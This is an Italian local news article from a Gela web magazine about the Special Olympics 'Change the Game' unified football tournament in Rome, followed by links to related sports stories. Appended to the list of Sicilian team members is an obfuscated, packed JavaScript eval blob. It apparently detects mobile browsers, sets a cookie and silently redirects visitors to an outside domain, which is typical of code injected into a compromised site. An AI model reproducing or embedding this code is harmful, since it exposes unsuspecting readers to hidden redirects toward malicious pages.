Sport

Cambiare si può: a Roma gli atleti gelesi

Cambiare si può: a Roma gli atleti gelesi

Roma – Si è svolto dal 13 al 15 di ottobre, presso il campo Pio XI dei Cavalieri di Colombo a Roma lo Special Olympics Unified Football Tournament, il torneo di calcio a 5 unificato denominato “Change the Game”.

Centoventi atleti con e senza disabilità intellettive, venuti da ogni parte d’Europa, sono stati protagonisti di un evento sportivo di caratura internazionale, ma non solo, sono stati anche promotori di un cambiamento culturale: le persone con disabilità intellettive oggi non sono più chiuse in casa o negli istituti, non sono più esonerate dall’attività fisica, anzi scendono in campo perché meritano di vivere pienamente così come chiunque altro.

Il torneo è stato aperto dallamichevole di calcio a5 Unificato che ha visto scendere in campo il Ministro dello Sport, Luca Lotti, ed il Presidente del Coni, Giovanni Malagò, capitani delle due squadre dell’Unified Match, il Presidente Mondiale di Special Olympics Tim Shriver ed alcuni ex giocatori di serie A

 

Contestualmente al torneo,  si è realizzato, sabato 14 ottobre presso il teatro del Pio XI, il primo Forum nazionale di Special Olympics Italia “We ChangetheGame with PlayUnified”, uno “spettacolo” di grande umanità e condivisione. Atleti e familiari si sono cimentati in una vera e propria rappresentazione teatrale raccontando le proprie storie di vita in un’atmosfera che ha riprodotto il calore di una casa: quella di Special Olympics che apre la porta al resto del mondo.

Ciò che è emerso è proprio un urgente bisogno di normalità. Le persone con disabilità intellettive vivono maturando bisogni per nulla speciali, quali, ad esempio, quello di essere accettati nel gruppo di amici, di vivere in autonomia senza genitori, di lavorare, di innamorarsi e, ancora, di fare sport e migliorare quando nessuno lo credeva possibile.

Quello di cui hanno realmente bisogno, forse, è solo un’opportunità, una soltanto, e il risultato potrebbe essere straordinario.

Un’inaspettata quanto straordinaria dimostrazione di ciò è avvenuta, venerdì, 13 ottobre, quando Papa Francesco ha accolto in udienza privata le delegazioni del torneo. La piccola Gemma di soli 4 anni, atleta del programma Young Athletes, dopo aver consegnato in dono al Santo Padre un paio di scarpe rosse con il logo del Movimento si è arrampicata sulla sedia del vescovo, proprio accanto a Lui e li è rimasta per tutto il tempo restituendo al mondo un’immagine rivoluzionaria. Gemma, incoscientemente, è diventata il simbolo del senso profondo del “Change the Game”: avere il coraggio di cambiare prospettiva per cambiare la società.

Il Team Special Olympics  Sicilia, dopo i momenti emozionanti vissuti nei tre giorni trascorsi a Roma, è pronto per scendere in campo per contribuire al cambiamento culturale in Sicilia, partendo dall’esperienza dell’associazione Orizzonte Gela che da 21 anni segue il Programma Special Olympics, avendo avuto il coraggio di cambiare prospettiva per cambiare la società per abbattere le paure, gli stereotipi e i pregiudizi, propri ed altrui. Un punto di partenza per un futuro migliore, dove ognuno vince la propria partita con la vita perché ha l’opportunità di mettere in campo tutte le sue potenzialità per appartenere ad un mondo più inclusivo.

Questi i componenti del Team:  Saluci Natale, Direttore Regionale  Special Olympics Team Sicilia;Francesco Scimonelli,Referente Regionale  Area Medico psico- pedagogica; Gianfranco Cassarino,Referente Regionale  Area Tecnica; Sivana Palumbo Referente Regionale  Area Volontari; Salvatore Buccheri, Referenre Regionale Area Famiglia; Emanuela Belluomo, Referente Regionale  Area Atleta; Sergio Minniti, Direttore Provinciale di Messina; Salvatore Marletta,Direttore Provinciale di Catania; Fabio Cilia, Direttore Provinciale di Ragusa.eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

Stampa articolo
Visualizzazioni articolo: 528
Sport

di più in Sport

3° Memorial Roberto Romagnoli

Redazione21 settembre 2018

Gymnastics Club va alla Golden Age Gym Festival di Pesaro con Di Tavi

Redazione13 settembre 2018

Cascino al secondo posto Memorial Rosario Zappalà dell’etneo

Redazione4 settembre 2018

Primo torneo giallo di basket

Redazione20 agosto 2018

In gara nel ricordo di Giuseppe Lauretta

Liliana Blanco2 agosto 2018

Un memorial dedicato a Giuseppe Lauretta

Liliana Blanco30 luglio 2018

La ginnastica artistica in spiaggia

Redazione27 luglio 2018

Gli avvocati vincono il torneo di calcetto ‘Mons Alabiso’

Liliana Blanco24 luglio 2018

Festa dello sport a Niscemi

Redazione23 luglio 2018

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856